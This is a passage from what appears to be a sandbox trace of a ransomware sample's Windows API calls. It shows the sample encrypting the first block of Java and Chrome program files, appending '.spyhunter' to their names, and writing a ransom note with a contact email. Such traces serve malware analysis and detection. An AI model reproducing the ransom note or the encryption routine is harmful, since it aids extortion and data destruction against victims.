dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.382] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e4ec*=0x2800, lpOverlapped=0x0) returned 1 [0175.382] GetProcessHeap () returned 0x2c0000 [0175.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0175.382] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.382] WriteFile (in: hFile=0x178, lpBuffer=0x57e52c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4ec, lpOverlapped=0x0 | out: lpBuffer=0x57e52c*, lpNumberOfBytesWritten=0x57e4ec*=0x4, lpOverlapped=0x0) returned 1 [0175.390] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4ec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4ec*=0x30, lpOverlapped=0x0) returned 1 [0175.390] CloseHandle (hObject=0x178) returned 1 [0175.391] GetProcessHeap () returned 0x2c0000 [0175.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.391] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\glass.dll.spyhunter") returned 60 [0175.391] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\glass.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\glass.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\glass.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\glass.dll.spyhunter")) returned 1 [0175.392] GetProcessHeap () returned 0x2c0000 [0175.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.392] GetProcessHeap () returned 0x2c0000 [0175.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0175.392] GetProcessHeap () returned 0x2c0000 [0175.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c207b0 | out: hHeap=0x2c0000) returned 1 [0175.392] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e530 | out: pbBuffer=0x57e530) returned 1 [0175.392] GetProcessHeap () returned 0x2c0000 [0175.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0175.392] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e528*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e528*=0x30) returned 1 [0175.392] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\eula.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\eula.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0175.393] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\eula.dll") returned 49 [0175.393] StrStrW (lpFirst="eula.dll", lpSrch=".txt") returned 0x0 [0175.393] GetProcessHeap () returned 0x2c0000 [0175.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0175.393] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e4ec*=0x2800, lpOverlapped=0x0) returned 1 [0175.413] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.413] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e4ec*=0x2800, lpOverlapped=0x0) returned 1 [0175.413] GetProcessHeap () returned 0x2c0000 [0175.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0175.414] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.414] WriteFile (in: hFile=0x178, lpBuffer=0x57e52c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4ec, lpOverlapped=0x0 | out: lpBuffer=0x57e52c*, lpNumberOfBytesWritten=0x57e4ec*=0x4, lpOverlapped=0x0) returned 1 [0175.414] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4ec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4ec*=0x30, lpOverlapped=0x0) returned 1 [0175.414] CloseHandle (hObject=0x178) returned 1 [0175.415] GetProcessHeap () returned 0x2c0000 [0175.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.415] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\eula.dll.spyhunter") returned 59 [0175.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\eula.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\eula.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\eula.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\eula.dll.spyhunter")) returned 1 [0175.416] GetProcessHeap () returned 0x2c0000 [0175.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.416] GetProcessHeap () returned 0x2c0000 [0175.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0175.416] GetProcessHeap () returned 0x2c0000 [0175.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20700 | out: hHeap=0x2c0000) returned 1 [0175.416] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dtplugin\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0175.418] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0175.418] WriteFile (in: hFile=0x178, lpBuffer=0x57e45f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e588, lpOverlapped=0x0 | out: lpBuffer=0x57e45f*, lpNumberOfBytesWritten=0x57e588*=0x127, lpOverlapped=0x0) returned 1 [0175.419] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0175.419] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e588, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e588*=0x2ac, lpOverlapped=0x0) returned 1 [0175.419] CloseHandle (hObject=0x178) returned 1 [0175.419] GetProcessHeap () returned 0x2c0000 [0175.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e039b8 | out: hHeap=0x2c0000) returned 1 [0175.419] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e528 | out: pbBuffer=0x57e528) returned 1 [0175.419] GetProcessHeap () returned 0x2c0000 [0175.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0175.419] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e520*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e520*=0x30) returned 1 [0175.419] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dtplugin\\npdeployjava1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0175.420] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\npdeployJava1.dll") returned 67 [0175.420] StrStrW (lpFirst="npdeployJava1.dll", lpSrch=".txt") returned 0x0 [0175.420] GetProcessHeap () returned 0x2c0000 [0175.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0175.420] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e4e4*=0x2800, lpOverlapped=0x0) returned 1 [0175.450] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.450] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e4e4*=0x2800, lpOverlapped=0x0) returned 1 [0175.450] GetProcessHeap () returned 0x2c0000 [0175.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0175.450] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.450] WriteFile (in: hFile=0x178, lpBuffer=0x57e524*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4e4, lpOverlapped=0x0 | out: lpBuffer=0x57e524*, lpNumberOfBytesWritten=0x57e4e4*=0x4, lpOverlapped=0x0) returned 1 [0175.451] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4e4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4e4*=0x30, lpOverlapped=0x0) returned 1 [0175.451] CloseHandle (hObject=0x178) returned 1 [0175.484] GetProcessHeap () returned 0x2c0000 [0175.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.484] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\npdeployJava1.dll.spyhunter") returned 77 [0175.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dtplugin\\npdeployjava1.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\npdeployJava1.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dtplugin\\npdeployjava1.dll.spyhunter")) returned 1 [0175.485] GetProcessHeap () returned 0x2c0000 [0175.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.485] GetProcessHeap () returned 0x2c0000 [0175.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0175.485] GetProcessHeap () returned 0x2c0000 [0175.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03a88 | out: hHeap=0x2c0000) returned 1 [0175.485] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e520 | out: pbBuffer=0x57e520) returned 1 [0175.485] GetProcessHeap () returned 0x2c0000 [0175.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0175.485] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e518*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e518*=0x30) returned 1 [0175.485] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dcpr.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dcpr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0175.486] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dcpr.dll") returned 49 [0175.486] StrStrW (lpFirst="dcpr.dll", lpSrch=".txt") returned 0x0 [0175.486] GetProcessHeap () returned 0x2c0000 [0175.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0175.486] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e4dc*=0x2800, lpOverlapped=0x0) returned 1 [0175.576] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.576] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e4dc*=0x2800, lpOverlapped=0x0) returned 1 [0175.576] GetProcessHeap () returned 0x2c0000 [0175.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0175.576] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.576] WriteFile (in: hFile=0xa0, lpBuffer=0x57e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4dc, lpOverlapped=0x0 | out: lpBuffer=0x57e51c*, lpNumberOfBytesWritten=0x57e4dc*=0x4, lpOverlapped=0x0) returned 1 [0175.631] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4dc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4dc*=0x30, lpOverlapped=0x0) returned 1 [0175.632] CloseHandle (hObject=0xa0) returned 1 [0175.632] GetProcessHeap () returned 0x2c0000 [0175.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.632] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dcpr.dll.spyhunter") returned 59 [0175.632] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dcpr.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dcpr.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dcpr.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dcpr.dll.spyhunter")) returned 1 [0175.633] GetProcessHeap () returned 0x2c0000 [0175.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.633] GetProcessHeap () returned 0x2c0000 [0175.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0175.633] GetProcessHeap () returned 0x2c0000 [0175.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c204f0 | out: hHeap=0x2c0000) returned 1 [0175.633] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e520 | out: pbBuffer=0x57e520) returned 1 [0175.633] GetProcessHeap () returned 0x2c0000 [0175.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0175.633] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e518*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e518*=0x30) returned 1 [0175.633] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logocanary.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0175.634] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png") returned 96 [0175.634] StrStrW (lpFirst="logocanary.png", lpSrch=".txt") returned 0x0 [0175.634] GetProcessHeap () returned 0x2c0000 [0175.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0175.635] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e4dc*=0x2800, lpOverlapped=0x0) returned 1 [0175.638] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.638] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e4dc*=0x2800, lpOverlapped=0x0) returned 1 [0175.638] GetProcessHeap () returned 0x2c0000 [0175.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0175.638] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.638] WriteFile (in: hFile=0xa0, lpBuffer=0x57e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4dc, lpOverlapped=0x0 | out: lpBuffer=0x57e51c*, lpNumberOfBytesWritten=0x57e4dc*=0x4, lpOverlapped=0x0) returned 1 [0175.639] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4dc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4dc*=0x30, lpOverlapped=0x0) returned 1 [0175.639] CloseHandle (hObject=0xa0) returned 1 [0175.639] GetProcessHeap () returned 0x2c0000 [0175.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.639] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png.spyhunter") returned 106 [0175.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logocanary.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logocanary.png.spyhunter")) returned 1 [0175.641] GetProcessHeap () returned 0x2c0000 [0175.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.641] GetProcessHeap () returned 0x2c0000 [0175.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0175.641] GetProcessHeap () returned 0x2c0000 [0175.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec8010 | out: hHeap=0x2c0000) returned 1 [0175.641] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e518 | out: pbBuffer=0x57e518) returned 1 [0175.641] GetProcessHeap () returned 0x2c0000 [0175.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0175.642] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e510*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e510*=0x30) returned 1 [0175.642] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0175.643] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png") returned 90 [0175.643] StrStrW (lpFirst="logo.png", lpSrch=".txt") returned 0x0 [0175.643] GetProcessHeap () returned 0x2c0000 [0175.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0175.643] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e4d4*=0x2800, lpOverlapped=0x0) returned 1 [0175.644] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.644] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e4d4*=0x2800, lpOverlapped=0x0) returned 1 [0175.645] GetProcessHeap () returned 0x2c0000 [0175.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0175.645] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.645] WriteFile (in: hFile=0xa0, lpBuffer=0x57e514*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4d4, lpOverlapped=0x0 | out: lpBuffer=0x57e514*, lpNumberOfBytesWritten=0x57e4d4*=0x4, lpOverlapped=0x0) returned 1 [0175.646] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4d4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4d4*=0x30, lpOverlapped=0x0) returned 1 [0175.646] CloseHandle (hObject=0xa0) returned 1 [0175.646] GetProcessHeap () returned 0x2c0000 [0175.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.646] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.spyhunter") returned 100 [0175.646] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logo.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logo.png.spyhunter")) returned 1 [0175.647] GetProcessHeap () returned 0x2c0000 [0175.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.647] GetProcessHeap () returned 0x2c0000 [0175.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0175.647] GetProcessHeap () returned 0x2c0000 [0175.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5e8c0 | out: hHeap=0x2c0000) returned 1 [0175.648] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e518 | out: pbBuffer=0x57e518) returned 1 [0175.648] GetProcessHeap () returned 0x2c0000 [0175.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0175.648] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e510*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e510*=0x30) returned 1 [0175.648] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\natives_blob.bin" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\natives_blob.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 